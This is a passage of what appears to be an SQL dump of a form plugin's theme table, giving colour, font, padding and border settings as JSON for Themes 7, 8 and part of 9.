\",\"PSAPBorderTop\":\"top\",\"PSAPBorderRight\":\"right\",\"PSAPBorderBottom\":\"bottom\",\"PSAPBorderLeft\":\"left\",\"PSAPBorderColor\":\"#ffb33a\",\"PSAPBorderType\":\"solid\",\"PSAPBorderWidth\":\"2\",\"PSAPBorderRadius\":\"3\",\"PSDPBGColor\":\"#1d6d69\",\"PSDPFontSize\":\"16\",\"PSDPFontWeight\":\"normal\",\"PSDPColor\":\"#ffffff\",\"PSDPHeight\":\"\",\"PSDPLineHeight\":\"\",\"PSDPPadding\":\"4px 6px\",\"PSDPMargin\":\"0 0 0 -3px\",\"PSDPBorderTop\":\"top\",\"PSDPBorderRight\":\"right\",\"PSDPBorderBottom\":\"bottom\",\"PSDPBorderLeft\":\"left\",\"PSDPBorderColor\":\"#1d6d69\",\"PSDPBorderType\":\"solid\",\"PSDPBorderWidth\":\"2\",\"PSDPBorderRadius\":\"3\",\"PSAPAlign\":\"right\",\"PSAPWidth\":\"\",\"PPAPWidth\":\"100%\",\"NBPBGColor\":\"\",\"NBPWidth\":\"\",\"NBPHeight\":\"\",\"NBPLineHeight\":\"\",\"NBPColor\":\"#ffffff\",\"NBPPadding\":\"4px 10px\",\"NBPMargin\":\"0px\",\"NBPBorderColor\":\"#777777\",\"NBPBorderType\":\"solid\",\"NBPBorderWidth\":\"1\",\"NBPBorderRadius\":\"0\",\"NBPBoxShadow\":\"\",\"NBHPBGColor\":\"\",\"NBHPColor\":\"#018c8b\",\"NBHPBorderColor\":\"#787878\",\"NBHPBorderType\":\"solid\",\"NBHPBorderWidth\":\"1\",\"PBPBGColor\":\"\",\"PBPWidth\":\"100\",\"PBPHeight\":\"\",\"PBPLineHeight\":\"\",\"PBPColor\":\"#ffffff\",\"PBPPadding\":\"\",\"PBPMargin\":\"0px\",\"PBPBorderColor\":\"#777777\",\"PBPBorderType\":\"solid\",\"PBPBorderWidth\":\"1\",\"PBPBorderRadius\":\"0\",\"PBPBoxShadow\":\"\",\"PBHPBGColor\":\"\",\"PBHPColor\":\"#d82534\",\"PBHPBorderColor\":\"#787878\",\"PBHPBorderType\":\"solid\",\"PBHPBorderWidth\":\"1\",\"CBPPosition\":\"absolute\",\"CBPTop\":\"10px\",\"CBPRight\":\"10px\",\"CBPBottom\":\"\",\"CBPLeft\":\"\",\"CBPBGColor\":\"\",\"CBPFontSize\":\"16\",\"CBPFontWeight\":\"lighter\",\"CBPColor\":\"#ffb33a\",\"CBPPadding\":\"0px\",\"CBPMargin\":\"0px\",\"CBPBorderColor\":\"#ffffff\",\"CBPBorderType\":\"solid\",\"CBPBorderWidth\":\"1\",\"CBPBorderRadius\":\"0\",\"CBHPBGColor\":\"\",\"CBHPColor\":\"#f60c5b\",\"CBHPBorderColor\":\"#ffffff\",\"CBHPBorderType\":\"solid\",\"CBHPBorderWidth\":\"1\",\"MBPBGColor\":\"#1d6d69\",\"MBPFontSize\":\"16\",\"MBPFontWeight\":\"normal\",\"MBPColor\":\"#ffffff\",\"MBPTextAlign\":\"center\",\"MBPPadding\":\"10px\",\"MBPMargin\":\"\",\"MBPBorderTop\":\"top\",\"MBPBorderRight\":\"right\",\"MBPBorderBottom\":\"bottom\",\"MBPBorderLeft\":\"left\",\"MBPBorderColor\":\"#1d6d69\",\"MBPBorderType\":\"solid\",\"MBPBorderWidth\":\"2\",\"MBPBorderRadius\":\"0\",\"MBHPBGColor\":\"#ffffff\",\"MBHPColor\":\"#1d6d69\",\"MBHPBorderTop\":\"top\",\"MBHPBorderRight\":\"right\",\"MBHPBorderBottom\":\"bottom\",\"MBHPBorderLeft\":\"left\",\"MBHPBorderColor\":\"#1d6d69\",\"MBHPBorderType\":\"solid\",\"MBHPBorderWidth\":\"2\",\"OPDeInputColor\":\"#afafaf\",\"OPFontStyle\":\"normal\",\"OPRColor\":\"#ffffff\",\"OPDPIcon\":\"images/themes/date-pickers/2.png\",\"OPDPRepeat\":\"no-repeat\",\"OPDPPos1\":\"0%\",\"OPDPPos2\":\"10%\",\"OPDPMargin\":\"3px 0 0 -23px\",\"OPFBgUrl\":\"images/themes/file-uploads/2.png\",\"OPFBGRepeat\":\"no-repeat\",\"OPFPos1\":\"0%\",\"OPFPos2\":\"10%\",\"OPGWidth\":\"100\",\"CUPCSS\":\"\"}',0,2),(7,'Theme 7','{\"GPFontFamily\":\"PT Sans\",\"AGPWidth\":\"100\",\"AGPSPWidth\":\"35\",\"AGPPadding\":\"\",\"AGPMargin\":\"0 auto\",\"AGPBorderColor\":\"#ffffff\",\"AGPBorderType\":\"solid\",\"AGPBorderWidth\":\"1\",\"AGPBorderRadius\":\"0\",\"AGPBoxShadow\":\"\",\"HPAlign\":\"top\",\"HPBGColor\":\"#ffffff\",\"HPWidth\":\"100\",\"HTPWidth\":\"40\",\"HPPadding\":\"10px 0\",\"HPMargin\":\"\",\"HPTextAlign\":\"center\",\"HPBorderColor\":\"#b7b7b7\",\"HPBorderType\":\"solid\",\"HPBorderWidth\":\"1\",\"HPBorderRadius\":\"0\",\"HTPFontSize\":\"27\",\"HTPWeight\":\"bold\",\"HTPColor\":\"#3596d4\",\"HDPFontSize\":\"15\",\"HDPColor\":\"#808080\",\"HIPAlign\":\"left\",\"HIPWidth\":\"80\",\"HIPHeight\":\"\",\"GPBGColor\":\"#2d4d5f\",\"GPFontSize\":\"15\",\"GPFontWeight\":\"normal\",\"GPWidth\":\"100\",\"GTPWidth\":\"60\",\"GPAlign\":\"center\",\"GPBackground\":\"\",\"GPBackgroundRepeat\":\"no-repeat\",\"GPBGPosition1\":\"\",\"GPBGPosition2\":\"\",\"GPBGSize1\":\"\",\"GPBGSize2\":\"\",\"GPColor\":\"#ffffff\",\"GPPadding\":\"10px\",\"GPMargin\":\"\",\"GPBorderColor\":\"#ffffff\",\"GPBorderType\":\"solid\",\"GPBorderWidth\":\"1\",\"GPBorderRadius\":\"0\",\"GPMLFontSize\":\"14\",\"GPMLFontWeight\":\"normal\",\"GPMLColor\":\"#ffffff\",\"GPMLPadding\":\"0px 5px 0px 0px\",\"GPMLMargin\":\"0px\",\"SEPBGColor\":\"#2d4d5f\",\"SEPPadding\":\"\",\"SEPMargin\":\"\",\"COPPadding\":\"10px\",\"COPMargin\":\"0px\",\"FPWidth\":\"80\",\"FPPadding\":\"15px 0 0 0\",\"FPMargin\":\"0 auto\",\"IPHeight\":\"26\",\"IPFontSize\":\"13\",\"IPFontWeight\":\"normal\",\"IPBGColor\":\"#ffffff\",\"IPColor\":\"#a0a0a0\",\"IPPadding\":\"0px 5px\",\"IPMargin\":\"0px\",\"IPBorderTop\":\"top\",\"IPBorderRight\":\"right\",\"IPBorderBottom\":\"bottom\",\"IPBorderLeft\":\"left\",\"IPBorderColor\":\"#d6d6d6\",\"IPBorderType\":\"solid\",\"IPBorderWidth\":\"1\",\"IPBorderRadius\":\"0\",\"IPBoxShadow\":\"\",\"SBPAppearance\":\"none\",\"SBPBackground\":\"images/themes/drop-downs/2.png\",\"SBPBGRepeat\":\"no-repeat\",\"SBPBGPos1\":\"95%\",\"SBPBGPos2\":\"50%\",\"SBPBGSize1\":\"8%\",\"SBPBGSize2\":\"32%\",\"SCPBGColor\":\"\",\"SCPWidth\":\"14\",\"SCPHeight\":\"14\",\"SCPBorderTop\":\"top\",\"SCPBorderRight\":\"right\",\"SCPBorderBottom\":\"bottom\",\"SCPBorderLeft\":\"left\",\"SCPBorderColor\":\"#ffffff\",\"SCPBorderType\":\"solid\",\"SCPBorderWidth\":\"1\",\"SCPMargin\":\"0px 3px\",\"SCPBorderRadius\":\"15\",\"SCPBoxShadow\":\"\",\"SCCPBGColor\":\"#ffffff\",\"SCCPWidth\":\"8\",\"SCCPHeight\":\"8\",\"SCCPMargin\":\"3\",\"SCCPBorderRadius\":\"10\",\"MCPBGColor\":\"\",\"MCPWidth\":\"14\",\"MCPHeight\":\"14\",\"MCPBorderTop\":\"top\",\"MCPBorderRight\":\"right\",\"MCPBorderBottom\":\"bottom\",\"MCPBorderLeft\":\"left\",\"MCPBorderColor\":\"#ffffff\",\"MCPBorderType\":\"solid\",\"MCPBorderWidth\":\"1\",\"MCPMargin\":\"0px 3px\",\"MCPBorderRadius\":\"0\",\"MCPBoxShadow\":\"\",\"MCCPBGColor\":\"#ffffff\",\"MCCPBackground\":\"\",\"MCCPBGRepeat\":\"no-repeat\",\"MCCPBGPos1\":\"\",\"MCCPBGPos2\":\"\",\"MCCPWidth\":\"10\",\"MCCPHeight\":\"10\",\"MCCPMargin\":\"2\",\"MCCPBorderRadius\":\"0\",\"SPAlign\":\"right\",\"SPBGColor\":\"#ffb33a\",\"SPWidth\":\"\",\"SPHeight\":\"\",\"SPFontSize\":\"15\",\"SPFontWeight\":\"normal\",\"SPColor\":\"#ffffff\",\"SPPadding\":\"6px 10px\",\"SPMargin\":\"0 15px 0 0 \",\"SPBorderColor\":\"#ffffff\",\"SPBorderType\":\"solid\",\"SPBorderWidth\":\"1\",\"SPBorderRadius\":\"0\",\"SPBoxShadow\":\"2px 2px 2px #1f3c4c\",\"SHPBGColor\":\"#ba9911\",\"SHPColor\":\"#ffffff\",\"SHPBorderColor\":\"#ffffff\",\"SHPBorderType\":\"solid\",\"SHPBorderWidth\":\"1\",\"BPBGColor\":\"#44acf0\",\"BPWidth\":\"\",\"BPHeight\":\"\",\"BPFontSize\":\"15\",\"BPFontWeight\":\"normal\",\"BPColor\":\"#ffffff\",\"BPPadding\":\"6px 10px\",\"BPMargin\":\"0 15px 0 0 \",\"BPBorderColor\":\"#ffffff\",\"BPBorderType\":\"solid\",\"BPBorderWidth\":\"1\",\"BPBorderRadius\":\"0\",\"BPBoxShadow\":\"2px 2px 2px #1f3c4c\",\"BHPBGColor\":\"#44acf0\",\"BHPColor\":\"#ffffff\",\"BHPBorderColor\":\"#ffffff\",\"BHPBorderType\":\"solid\",\"BHPBorderWidth\":\"1\",\"PSAPBGColor\":\"#44acf0\",\"PSAPFontSize\":\"16\",\"PSAPFontWeight\":\"normal\",\"PSAPColor\":\"#ffffff\",\"PSAPHeight\":\"\",\"PSAPLineHeight\":\"\",\"PSAPPadding\":\"8px\",\"PSAPMargin\":\"0\",\"PSAPBorderTop\":\"top\",\"PSAPBorderRight\":\"right\",\"PSAPBorderBottom\":\"bottom\",\"PSAPBorderLeft\":\"left\",\"PSAPBorderColor\":\"#44acf0\",\"PSAPBorderType\":\"solid\",\"PSAPBorderWidth\":\"2\",\"PSAPBorderRadius\":\"3\",\"PSDPBGColor\":\"#ffffff\",\"PSDPFontSize\":\"16\",\"PSDPFontWeight\":\"normal\",\"PSDPColor\":\"#808080\",\"PSDPHeight\":\"\",\"PSDPLineHeight\":\"\",\"PSDPPadding\":\"4px 6px\",\"PSDPMargin\":\"0 0 0 -3px\",\"PSDPBorderTop\":\"top\",\"PSDPBorderRight\":\"right\",\"PSDPBorderBottom\":\"bottom\",\"PSDPBorderLeft\":\"left\",\"PSDPBorderColor\":\"#808080\",\"PSDPBorderType\":\"solid\",\"PSDPBorderWidth\":\"1\",\"PSDPBorderRadius\":\"3\",\"PSAPAlign\":\"right\",\"PSAPWidth\":\"\",\"PPAPWidth\":\"100%\",\"NBPBGColor\":\"\",\"NBPWidth\":\"\",\"NBPHeight\":\"\",\"NBPLineHeight\":\"\",\"NBPColor\":\"#ffffff\",\"NBPPadding\":\"4px 10px\",\"NBPMargin\":\"0px\",\"NBPBorderColor\":\"#777777\",\"NBPBorderType\":\"solid\",\"NBPBorderWidth\":\"1\",\"NBPBorderRadius\":\"0\",\"NBPBoxShadow\":\"\",\"NBHPBGColor\":\"\",\"NBHPColor\":\"#ba9911\",\"NBHPBorderColor\":\"#787878\",\"NBHPBorderType\":\"solid\",\"NBHPBorderWidth\":\"1\",\"PBPBGColor\":\"\",\"PBPWidth\":\"100\",\"PBPHeight\":\"\",\"PBPLineHeight\":\"\",\"PBPColor\":\"#ffffff\",\"PBPPadding\":\"\",\"PBPMargin\":\"0px\",\"PBPBorderColor\":\"#777777\",\"PBPBorderType\":\"solid\",\"PBPBorderWidth\":\"1\",\"PBPBorderRadius\":\"0\",\"PBPBoxShadow\":\"\",\"PBHPBGColor\":\"\",\"PBHPColor\":\"#ba9911\",\"PBHPBorderColor\":\"#787878\",\"PBHPBorderType\":\"solid\",\"PBHPBorderWidth\":\"1\",\"CBPPosition\":\"absolute\",\"CBPTop\":\"10px\",\"CBPRight\":\"10px\",\"CBPBottom\":\"\",\"CBPLeft\":\"\",\"CBPBGColor\":\"\",\"CBPFontSize\":\"16\",\"CBPFontWeight\":\"lighter\",\"CBPColor\":\"#808080\",\"CBPPadding\":\"0px\",\"CBPMargin\":\"0px\",\"CBPBorderColor\":\"#ffffff\",\"CBPBorderType\":\"solid\",\"CBPBorderWidth\":\"1\",\"CBPBorderRadius\":\"0\",\"CBHPBGColor\":\"\",\"CBHPColor\":\"#ffb33a\",\"CBHPBorderColor\":\"#ffffff\",\"CBHPBorderType\":\"solid\",\"CBHPBorderWidth\":\"1\",\"MBPBGColor\":\"#ffffff\",\"MBPFontSize\":\"16\",\"MBPFontWeight\":\"normal\",\"MBPColor\":\"#3596d4\",\"MBPTextAlign\":\"center\",\"MBPPadding\":\"10px\",\"MBPMargin\":\"\",\"MBPBorderTop\":\"top\",\"MBPBorderRight\":\"right\",\"MBPBorderBottom\":\"bottom\",\"MBPBorderLeft\":\"left\",\"MBPBorderColor\":\"#2d4d5f\",\"MBPBorderType\":\"solid\",\"MBPBorderWidth\":\"2\",\"MBPBorderRadius\":\"0\",\"MBHPBGColor\":\"#3596d4\",\"MBHPColor\":\"#ffffff\",\"MBHPBorderTop\":\"top\",\"MBHPBorderRight\":\"right\",\"MBHPBorderBottom\":\"bottom\",\"MBHPBorderLeft\":\"left\",\"MBHPBorderColor\":\"#2d4d5f\",\"MBHPBorderType\":\"solid\",\"MBHPBorderWidth\":\"2\",\"OPDeInputColor\":\"#afafaf\",\"OPFontStyle\":\"normal\",\"OPRColor\":\"#ffb33a\",\"OPDPIcon\":\"images/themes/date-pickers/2.png\",\"OPDPRepeat\":\"no-repeat\",\"OPDPPos1\":\"0%\",\"OPDPPos2\":\"10%\",\"OPDPMargin\":\"3px 0 0 -23px\",\"OPFBgUrl\":\"images/themes/file-uploads/2.png\",\"OPFBGRepeat\":\"no-repeat\",\"OPFPos1\":\"0%\",\"OPFPos2\":\"10%\",\"OPGWidth\":\"100\",\"CUPCSS\":\"\"}',0,2),(8,'Theme 8','{\"GPFontFamily\":\"PT Sans\",\"AGPWidth\":\"100\",\"AGPSPWidth\":\"35\",\"AGPPadding\":\"\",\"AGPMargin\":\"0 auto\",\"AGPBorderColor\":\"#ffffff\",\"AGPBorderType\":\"solid\",\"AGPBorderWidth\":\"1\",\"AGPBorderRadius\":\"0\",\"AGPBoxShadow\":\"\",\"HPAlign\":\"top\",\"HPBGColor\":\"#435c71\",\"HPWidth\":\"100\",\"HTPWidth\":\"40\",\"HPPadding\":\"20px\",\"HPMargin\":\"\",\"HPTextAlign\":\"center\",\"HPBorderColor\":\"#b7b7b7\",\"HPBorderType\":\"solid\",\"HPBorderWidth\":\"1\",\"HPBorderRadius\":\"0\",\"HTPFontSize\":\"30\",\"HTPWeight\":\"bold\",\"HTPColor\":\"#e6c41b\",\"HDPFontSize\":\"15\",\"HDPColor\":\"#ffffff\",\"HIPAlign\":\"left\",\"HIPWidth\":\"66\",\"HIPHeight\":\"\",\"GPBGColor\":\"#f8f8f8\",\"GPFontSize\":\"15\",\"GPFontWeight\":\"bold\",\"GPWidth\":\"100\",\"GTPWidth\":\"60\",\"GPAlign\":\"center\",\"GPBackground\":\"\",\"GPBackgroundRepeat\":\"no-repeat\",\"GPBGPosition1\":\"\",\"GPBGPosition2\":\"\",\"GPBGSize1\":\"\",\"GPBGSize2\":\"\",\"GPColor\":\"#3b3b3b\",\"GPPadding\":\"10px\",\"GPMargin\":\"\",\"GPBorderColor\":\"#ffffff\",\"GPBorderType\":\"solid\",\"GPBorderWidth\":\"1\",\"GPBorderRadius\":\"0\",\"GPMLFontSize\":\"11\",\"GPMLFontWeight\":\"normal\",\"GPMLColor\":\"#3b3b3b\",\"GPMLPadding\":\"0px 5px 0px 0px\",\"GPMLMargin\":\"0px\",\"SEPBGColor\":\"#f8f8f8\",\"SEPPadding\":\"\",\"SEPMargin\":\"\",\"COPPadding\":\"10px\",\"COPMargin\":\"0px\",\"FPWidth\":\"80\",\"FPPadding\":\"15px 0 0 0\",\"FPMargin\":\"0 auto\",\"IPHeight\":\"26\",\"IPFontSize\":\"13\",\"IPFontWeight\":\"normal\",\"IPBGColor\":\"#ffffff\",\"IPColor\":\"#6e6e6e\",\"IPPadding\":\"0px 5px\",\"IPMargin\":\"0px\",\"IPBorderTop\":\"top\",\"IPBorderRight\":\"right\",\"IPBorderBottom\":\"bottom\",\"IPBorderLeft\":\"left\",\"IPBorderColor\":\"#989898\",\"IPBorderType\":\"solid\",\"IPBorderWidth\":\"1\",\"IPBorderRadius\":\"0\",\"IPBoxShadow\":\"\",\"SBPAppearance\":\"none\",\"SBPBackground\":\"images/themes/drop-downs/3.png\",\"SBPBGRepeat\":\"no-repeat\",\"SBPBGPos1\":\"95%\",\"SBPBGPos2\":\"50%\",\"SBPBGSize1\":\"8%\",\"SBPBGSize2\":\"32%\",\"SCPBGColor\":\"\",\"SCPWidth\":\"14\",\"SCPHeight\":\"14\",\"SCPBorderTop\":\"top\",\"SCPBorderRight\":\"right\",\"SCPBorderBottom\":\"bottom\",\"SCPBorderLeft\":\"left\",\"SCPBorderColor\":\"#989898\",\"SCPBorderType\":\"solid\",\"SCPBorderWidth\":\"1\",\"SCPMargin\":\"0px 3px\",\"SCPBorderRadius\":\"15\",\"SCPBoxShadow\":\"\",\"SCCPBGColor\":\"#989898\",\"SCCPWidth\":\"6\",\"SCCPHeight\":\"6\",\"SCCPMargin\":\"4\",\"SCCPBorderRadius\":\"10\",\"MCPBGColor\":\"\",\"MCPWidth\":\"14\",\"MCPHeight\":\"14\",\"MCPBorderTop\":\"top\",\"MCPBorderRight\":\"right\",\"MCPBorderBottom\":\"bottom\",\"MCPBorderLeft\":\"left\",\"MCPBorderColor\":\"#989898\",\"MCPBorderType\":\"solid\",\"MCPBorderWidth\":\"1\",\"MCPMargin\":\"0px 3px\",\"MCPBorderRadius\":\"0\",\"MCPBoxShadow\":\"\",\"MCCPBGColor\":\"\",\"MCCPBackground\":\"images/themes/checkboxes/3.png\",\"MCCPBGRepeat\":\"no-repeat\",\"MCCPBGPos1\":\"\",\"MCCPBGPos2\":\"\",\"MCCPWidth\":\"16\",\"MCCPHeight\":\"16\",\"MCCPMargin\":\"0 0 2px 0\",\"MCCPBorderRadius\":\"0\",\"SPAlign\":\"right\",\"SPBGColor\":\"#f05e22\",\"SPWidth\":\"\",\"SPHeight\":\"\",\"SPFontSize\":\"15\",\"SPFontWeight\":\"normal\",\"SPColor\":\"#ffffff\",\"SPPadding\":\"6px 10px\",\"SPMargin\":\"0 15px 0 0 \",\"SPBorderColor\":\"#9eaab1\",\"SPBorderType\":\"solid\",\"SPBorderWidth\":\"1\",\"SPBorderRadius\":\"0\",\"SPBoxShadow\":\"2px 2px 2px #9eaab1\",\"SHPBGColor\":\"#d82534\",\"SHPColor\":\"#ffffff\",\"SHPBorderColor\":\"#ffffff\",\"SHPBorderType\":\"solid\",\"SHPBorderWidth\":\"1\",\"BPBGColor\":\"#f1cb15\",\"BPWidth\":\"\",\"BPHeight\":\"\",\"BPFontSize\":\"15\",\"BPFontWeight\":\"normal\",\"BPColor\":\"#424242\",\"BPPadding\":\"6px 10px\",\"BPMargin\":\"0 15px 0 0 \",\"BPBorderColor\":\"#ffffff\",\"BPBorderType\":\"solid\",\"BPBorderWidth\":\"1\",\"BPBorderRadius\":\"0\",\"BPBoxShadow\":\"2px 2px 2px #9eaab1\",\"BHPBGColor\":\"#435c71\",\"BHPColor\":\"#e6c41b\",\"BHPBorderColor\":\"#ffffff\",\"BHPBorderType\":\"solid\",\"BHPBorderWidth\":\"1\",\"PSAPBGColor\":\"#f05e22\",\"PSAPFontSize\":\"16\",\"PSAPFontWeight\":\"normal\",\"PSAPColor\":\"#ffffff\",\"PSAPHeight\":\"\",\"PSAPLineHeight\":\"\",\"PSAPPadding\":\"8px\",\"PSAPMargin\":\"0\",\"PSAPBorderTop\":\"top\",\"PSAPBorderRight\":\"right\",\"PSAPBorderBottom\":\"bottom\",\"PSAPBorderLeft\":\"left\",\"PSAPBorderColor\":\"#f05e22\",\"PSAPBorderType\":\"solid\",\"PSAPBorderWidth\":\"2\",\"PSAPBorderRadius\":\"3\",\"PSDPBGColor\":\"#ffffff\",\"PSDPFontSize\":\"16\",\"PSDPFontWeight\":\"bold\",\"PSDPColor\":\"#435c71\",\"PSDPHeight\":\"\",\"PSDPLineHeight\":\"\",\"PSDPPadding\":\"4px 6px\",\"PSDPMargin\":\"0 0 0 -3px\",\"PSDPBorderTop\":\"top\",\"PSDPBorderRight\":\"right\",\"PSDPBorderBottom\":\"bottom\",\"PSDPBorderLeft\":\"left\",\"PSDPBorderColor\":\"#435c71\",\"PSDPBorderType\":\"solid\",\"PSDPBorderWidth\":\"1\",\"PSDPBorderRadius\":\"3\",\"PSAPAlign\":\"right\",\"PSAPWidth\":\"\",\"PPAPWidth\":\"100%\",\"NBPBGColor\":\"\",\"NBPWidth\":\"\",\"NBPHeight\":\"\",\"NBPLineHeight\":\"\",\"NBPColor\":\"#3b3b3b\",\"NBPPadding\":\"4px 10px\",\"NBPMargin\":\"0px\",\"NBPBorderColor\":\"#777777\",\"NBPBorderType\":\"solid\",\"NBPBorderWidth\":\"1\",\"NBPBorderRadius\":\"0\",\"NBPBoxShadow\":\"\",\"NBHPBGColor\":\"\",\"NBHPColor\":\"#d82534\",\"NBHPBorderColor\":\"#787878\",\"NBHPBorderType\":\"solid\",\"NBHPBorderWidth\":\"1\",\"PBPBGColor\":\"\",\"PBPWidth\":\"100\",\"PBPHeight\":\"\",\"PBPLineHeight\":\"\",\"PBPColor\":\"#3b3b3b\",\"PBPPadding\":\"\",\"PBPMargin\":\"0px\",\"PBPBorderColor\":\"#777777\",\"PBPBorderType\":\"solid\",\"PBPBorderWidth\":\"1\",\"PBPBorderRadius\":\"0\",\"PBPBoxShadow\":\"\",\"PBHPBGColor\":\"\",\"PBHPColor\":\"#d82534\",\"PBHPBorderColor\":\"#787878\",\"PBHPBorderType\":\"solid\",\"PBHPBorderWidth\":\"1\",\"CBPPosition\":\"absolute\",\"CBPTop\":\"10px\",\"CBPRight\":\"10px\",\"CBPBottom\":\"\",\"CBPLeft\":\"\",\"CBPBGColor\":\"\",\"CBPFontSize\":\"16\",\"CBPFontWeight\":\"lighter\",\"CBPColor\":\"#e6c41b\",\"CBPPadding\":\"0px\",\"CBPMargin\":\"0px\",\"CBPBorderColor\":\"#ffffff\",\"CBPBorderType\":\"solid\",\"CBPBorderWidth\":\"1\",\"CBPBorderRadius\":\"0\",\"CBHPBGColor\":\"\",\"CBHPColor\":\"#d82534\",\"CBHPBorderColor\":\"#ffffff\",\"CBHPBorderType\":\"solid\",\"CBHPBorderWidth\":\"1\",\"MBPBGColor\":\"#435c71\",\"MBPFontSize\":\"16\",\"MBPFontWeight\":\"normal\",\"MBPColor\":\"#e6c41b\",\"MBPTextAlign\":\"center\",\"MBPPadding\":\"10px\",\"MBPMargin\":\"\",\"MBPBorderTop\":\"top\",\"MBPBorderRight\":\"right\",\"MBPBorderBottom\":\"bottom\",\"MBPBorderLeft\":\"left\",\"MBPBorderColor\":\"#435c71\",\"MBPBorderType\":\"solid\",\"MBPBorderWidth\":\"2\",\"MBPBorderRadius\":\"0\",\"MBHPBGColor\":\"#ffffff\",\"MBHPColor\":\"#e6c41b\",\"MBHPBorderTop\":\"top\",\"MBHPBorderRight\":\"right\",\"MBHPBorderBottom\":\"bottom\",\"MBHPBorderLeft\":\"left\",\"MBHPBorderColor\":\"#435c71\",\"MBHPBorderType\":\"solid\",\"MBHPBorderWidth\":\"2\",\"OPDeInputColor\":\"#afafaf\",\"OPFontStyle\":\"normal\",\"OPRColor\":\"#f05e22\",\"OPDPIcon\":\"images/themes/date-pickers/2.png\",\"OPDPRepeat\":\"no-repeat\",\"OPDPPos1\":\"0%\",\"OPDPPos2\":\"10%\",\"OPDPMargin\":\"3px 0 0 -23px\",\"OPFBgUrl\":\"images/themes/file-uploads/2.png\",\"OPFBGRepeat\":\"no-repeat\",\"OPFPos1\":\"0%\",\"OPFPos2\":\"10%\",\"OPGWidth\":\"100\",\"CUPCSS\":\"\"}',0,2),(9,'Theme 9','{\"GPFontFamily\":\"Open Sans Condensed\",\"AGPWidth\":\"100\",\"AGPSPWidth\":\"35\",\"AGPPadding\":\"\",\"AGPMargin\":\"0 auto\",\"AGPBorderColor\":\"#ffffff\",\"AGPBorderType\":\"solid\",\"AGPBorderWidth\":\"1\",\"AGPBorderRadius\":\"0\",\"AGPBoxShadow\":\"\",\"HPAlign\":\"left\",\"HPBGColor\":\"#4d4d4d\",\"HPWidth\":\"50\",\"HTPWidth\":\"40\",\"HPPadding\":\"10px\",\"HPMargin\":\"\",\"HPTextAlign\":\"center\",\"HPBorderColor\":\"#b7b7b7\",\"HPBorderType\":\"solid\",\"HPBorderWidth\":\"1\",\"HPBorderRadius\":\"0\",\"HTPFontSize\":\"26\",\"HTPWeight\":\"bold\",\"HTPColor\":\"#ffffff\",\"HDPFontSize\":\"14\",\"HDPColor\":\"#b95d3c\",\"HIPAlign\":\"top\",\"HIPWidth\":\"80\",\"HIPHeight\":\"\",\"GPBGColor\":\"#f8f8f8\",\"GPFontSize\":\"15\",\"GPFontWeight\":\"bold\",\"GPWidth\":\"50\",\"GTPWidth\":\"60\",\"GPAlign\":\"center\",\"GPBackground\":\"\",\"GPBackgroundRepeat\":\"no-repeat\",\"GPBGPosition1\":\"\",\"GPBGPosition2\":\"\",\"GPBGSize1\":\"\",\"GPBGSize2\":\"\",\"GPColor\":\"#3b3b3b\",\"GPPadding\":\"10px\",\"GPMargin\":\"\",\"GPBorderColor\":\"#ffffff\",\"GPBorderType\":\"solid\",\"GPBorderWidth\":\"1\",\"GPBorderRadius\":\"0\",\"GPMLFontSize\":\"14\",\"GPMLFontWeight\":\"normal\",\"GPMLColor\":\"#3b3b3b\",\"GPMLPadding\":\"0px 5px 0px 0px\",\"GPMLMargin\":\"0px\",\"SEPBGColor\":\"#f8f8f8\",\"SEPPadding\":\"\",\"SEPMargin\":\"\",\"COPPadding\":\"10px\",\"COPMargin\":\"0px\",\"FPWidth\":\"80\",\"FPPadding\":\"15px 0 0 0\",\"FPMargin\":\"0 auto\",\"IPHeight\":\"26\",\"IPFontSize\":\"13\",\"IPFontWeight\":\"normal\",\"IPBGColor\":\"#ffffff\",\"IPColor\":\"#6e6e6e\",\"IPPadding\":\"0px 5px\",\"IPMargin\":\"0px\",\"IPBorderTop\":\"top\",\"IPBorderRight\":\"right\",\"IPBorderBottom\":\"bottom\",\"IPBorderLeft\":\"left\",\"IPBorderColor\":\"#989898\",\"IPBorderType\":\"solid\",\"IPBorderWidth\":\"1\",\"IPBorderRadius\":\"0\",\"IPBoxShadow\":\"\",\"SBPAppearance\":\"none\",\"SBPBackground\":\"images/themes/drop-downs/3.png\",\"SBPBGRepeat\":\"no-repeat\",\"SBPBGPos1\":\"95%\",\"SBPBGPos2\":\"50%\",\"SBPBGSize1\":\"8%\",\"SBPBGSize2\":\"32%\",\"SCPBGColor\":\"\",\"SCPWidth\":\"14\",\"SCPHeight\":\"14\",\"SCPBorderTop\":\"top\",\"SCPBorderRight\":\"right\",\"SCPBorderBottom\":\"bottom\",\"SCPBorderLeft\":\"left\",\"SCPBorderColor\":\"#989898\",\"SCPBorderType\":\"solid\",\"SCPBorderWidth\":\"1\",\"SCPMargin\":\"0px 3px\",\"SCPBorderRadius\":\"15\",\"SCPBoxShadow\":\"\",\"SCCPBGColor\":\"#989898\",\"SCCPWidth\":\"6\",\"SCCPHeight\":\"6\",\"SCCPMargin\":\"4\",\"SCCPBorderRadius\":\"10\",\"MCPBGColor\":\"\",\"MCPWidth\":\"14\",\"MCPHeight\":\"14\",\"MCPBorderTop\":\"top\",\"MCPBorderRight\":\"right\",\"MCPBorderBottom\":\"bottom\",\"MCPBorderLeft\":\"left\",\"MCPBorderColor\":\"#989898\",\"MCPBorderType\":\"solid\",\"MCPBorderWidth\":\"1\",\"MCPMargin\":\"0px 3px\",\"MCPBorderRadius\":\"0\",\"MCPBoxShadow\":\"\",\"MCCPBGColor\":\"\",\"MCCPBackground\":\"images/themes/checkboxes/3.png\",\"MCCPBGRepeat\":\"no-repeat\",\"MCCPBGPos1\":\"\",\"MCCPBGPos2\":\"\",\"MCCPWidth\":\"16\",\"MCCPHeight\":\"16\",\"MCCPMargin\":\"0 0 2px 0\",\"MCCPBorderRadius\":\"0\",\"SPAlign\":\"right\",\"SPBGColor\":\"#f05e22\",\"SPWidth\":\"\",\"SPHeight\":\"\",\"SPFontSize\":\"15\",\"SPFontWeight\":\"normal\",\"SPColor\":\"#ffffff\",\"SPPadding\":\"6px 10px\",\"SPMargin\":\"\",\"SPBorderColor\":\"#9eaab1\",\"SPBorderType\":\"solid\",\"SPBorderWidth\":\"1\",\"SPBorderRadius\":\"0\",\"SPBoxShadow\":\"2px 2px 2px 